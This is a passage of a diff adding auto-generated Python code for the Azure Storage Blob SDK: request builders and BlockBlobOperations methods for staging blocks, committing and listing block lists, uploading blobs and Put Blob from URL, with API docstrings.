_SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + 
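+ # On the wire a block ID is an opaque Base64 string, and all IDs within one
+ # blob must have the same encoded length; staged blocks remain uncommitted
+ # until a Put Block List names them. An illustrative sketch via the public
+ # client, which accepts plain string IDs (placeholder names):
+ #
+ #     import uuid
+ #     from azure.storage.blob import BlobBlock
+ #     bid = str(uuid.uuid4())
+ #     blob_client.stage_block(block_id=bid, data=b"chunk-1")
+ #     blob_client.commit_block_list([BlobBlock(block_id=bid)])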
headers=_header_parameters, + **kwargs + ) + + +def build_stage_block_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "block") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + block_id = kwargs.pop('block_id') # type: str + content_length = kwargs.pop('content_length') # type: int + source_url = kwargs.pop('source_url') # type: str + source_range = kwargs.pop('source_range', None) # type: Optional[str] + source_content_md5 = kwargs.pop('source_content_md5', None) # type: Optional[bytearray] + source_contentcrc64 = kwargs.pop('source_contentcrc64', None) # type: Optional[bytearray] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + copy_source_authorization = kwargs.pop('copy_source_authorization', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['blockid'] = _SERIALIZER.query("block_id", block_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("source_url", source_url, 'str') + if source_range is not None: + _header_parameters['x-ms-source-range'] = _SERIALIZER.header("source_range", source_range, 'str') + if source_content_md5 is not None: + _header_parameters['x-ms-source-content-md5'] = _SERIALIZER.header("source_content_md5", source_content_md5, 'bytearray') + if source_contentcrc64 is not None: + _header_parameters['x-ms-source-content-crc64'] = _SERIALIZER.header("source_contentcrc64", source_contentcrc64, 'bytearray') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = 
_SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if copy_source_authorization is not None: + _header_parameters['x-ms-copy-source-authorization'] = _SERIALIZER.header("copy_source_authorization", copy_source_authorization, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_commit_block_list_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "blocklist") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + transactional_content_crc64 = kwargs.pop('transactional_content_crc64', None) # type: Optional[bytearray] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.AccessTierOptional"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: 
Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if transactional_content_crc64 is not None: + _header_parameters['x-ms-content-crc64'] = _SERIALIZER.header("transactional_content_crc64", transactional_content_crc64, 'bytearray') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if tier is 
not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_block_list_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "blocklist") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + list_type = kwargs.pop('list_type', "committed") # type: Union[str, "_models.BlockListType"] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + _query_parameters['blocklisttype'] = _SERIALIZER.query("list_type", list_type, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class BlockBlobOperations(object): + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`block_blob` attribute. 
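In application code these generated operations are usually driven indirectly
through the public ``azure.storage.blob.BlobClient`` wrapper rather than called
here. A minimal sketch, assuming a placeholder SAS URL::

    from azure.storage.blob import BlobClient

    blob = BlobClient.from_blob_url(
        "https://<account>.blob.core.windows.net/<container>/<blob>?<sas>"
    )
    # upload_blob drives BlockBlobOperations.upload (Put Blob) for small
    # payloads and falls back to stage_block/commit_block_list for large ones.
    blob.upload_blob(b"hello block blob", overwrite=True)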
+ """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def upload( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + body, # type: IO + timeout=None, # type: Optional[int] + transactional_content_md5=None, # type: Optional[bytearray] + metadata=None, # type: Optional[Dict[str, str]] + tier=None, # type: Optional[Union[str, "_models.AccessTierOptional"]] + request_id_parameter=None, # type: Optional[str] + blob_tags_string=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Upload Block Blob operation updates the content of an existing block blob. Updating an + existing block blob overwrites any existing metadata on the blob. Partial updates are not + supported with Put Blob; the content of the existing blob is overwritten with the content of + the new blob. To perform a partial update of the content of a block blob, use the Put Block + List operation. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. 
+ :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "BlockBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = 
modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_upload_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.upload.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def put_blob_from_url( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + copy_source, # type: str + timeout=None, # type: Optional[int] + transactional_content_md5=None, # type: Optional[bytearray] + metadata=None, # type: Optional[Dict[str, str]] + 
tier=None, # type: Optional[Union[str, "_models.AccessTierOptional"]] + request_id_parameter=None, # type: Optional[str] + source_content_md5=None, # type: Optional[bytearray] + blob_tags_string=None, # type: Optional[str] + copy_source_blob_properties=None, # type: Optional[bool] + copy_source_authorization=None, # type: Optional[str] + copy_source_tags=None, # type: Optional[Union[str, "_models.BlobCopySourceTags"]] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Put Blob from URL operation creates a new Block Blob where the contents of the blob are + read from a given URL. This API is supported beginning with the 2020-04-08 version. Partial + updates are not supported with Put Blob from URL; the content of an existing blob is + overwritten with the content of the new blob. To perform partial updates to a block blob’s + contents using a source URL, use the Put Block from URL API in conjunction with Put Block List. + + :param content_length: The length of the request. + :type content_length: long + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. 
Default + value is None. + :type blob_tags_string: str + :param copy_source_blob_properties: Optional, default is true. Indicates if properties from + the source blob should be copied. + :type copy_source_blob_properties: bool + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param copy_source_tags: Optional, default 'replace'. Indicates if source tags should be + copied or replaced with the tags specified by x-ms-tags. Default value is None. + :type copy_source_tags: str or ~azure.storage.blob.models.BlobCopySourceTags + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "BlockBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _source_if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + 
_encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + _source_if_tags = source_modified_access_conditions.source_if_tags + + request = build_put_blob_from_url_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + copy_source=copy_source, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + source_if_tags=_source_if_tags, + request_id_parameter=request_id_parameter, + source_content_md5=source_content_md5, + blob_tags_string=blob_tags_string, + copy_source_blob_properties=copy_source_blob_properties, + copy_source_authorization=copy_source_authorization, + copy_source_tags=copy_source_tags, + template_url=self.put_blob_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + 